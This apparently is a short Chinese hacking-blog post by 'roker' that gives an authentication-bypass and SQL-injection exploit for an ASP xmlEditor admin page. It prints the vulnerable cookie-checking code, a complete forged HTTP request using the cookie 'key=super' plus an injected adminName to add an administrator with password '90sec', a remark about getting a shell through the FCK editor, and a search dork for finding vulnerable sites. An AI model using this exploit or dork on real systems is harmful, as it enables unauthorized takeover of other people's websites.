Author:roker
xmlEditor/adminadd.asp
[php]
<%
if request.cookies("key")<>"super" then
response.Write("
")
Response.End
end if
%>
chkuser.asp
<%
set urs=server.createobject("adodb.recordset")
sql="select * from xmlAdmin where adminName='"&Request.cookies("adminName")&"'"
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
urs.close
set urs=nothing
%>[/php]
提交
[php]
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://xxx/xmlEditor/adminadd.asp
Cookie: key=super;adminName='%09or '1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com[/php]
添加账号密码为90sec的用户 = =
后台 fck编辑器 拿shell
关键字。。
inurl:"server.asp?flowNo="
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论